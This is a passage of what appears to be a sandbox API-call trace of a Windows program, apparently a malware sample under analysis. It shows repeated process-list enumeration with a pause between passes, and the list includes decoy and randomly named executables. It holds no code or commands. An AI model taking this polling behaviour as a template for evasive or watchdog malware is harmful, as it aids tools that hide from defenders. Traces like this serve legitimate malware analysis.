cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0149.355] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0149.357] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0149.358] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0149.359] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.360] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0149.361] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0149.362] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0149.363] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0149.372] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0149.373] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0149.374] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0149.375] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0149.377] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0149.378] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0149.379] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0149.380] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0149.381] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0149.382] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0149.383] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0149.384] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0149.386] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0149.387] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0149.388] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0149.389] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0149.390] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0149.391] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.392] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0149.393] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0149.394] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0149.395] CloseHandle (hObject=0xbc) returned 1 [0149.395] Sleep (dwMilliseconds=0x12c) [0149.743] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0149.748] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.748] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0149.749] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0149.750] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0149.750] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0149.751] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0149.752] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0149.752] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0149.753] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0149.754] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0149.754] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.755] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.756] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.757] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.758] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.758] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0149.759] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.760] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.761] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0149.762] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.763] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0149.764] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0149.765] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0149.766] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0149.768] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.769] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0149.770] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0149.771] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0149.772] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0149.773] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0149.774] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0149.775] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0149.776] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0149.777] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0149.778] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0149.779] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0149.781] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0149.782] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0149.783] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0149.784] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0149.865] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0149.866] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0149.867] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0149.868] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0149.869] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0149.870] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0149.871] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.872] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0149.873] CloseHandle (hObject=0xc4) returned 1 [0149.873] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0149.878] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.878] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0149.879] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0149.880] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0149.881] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 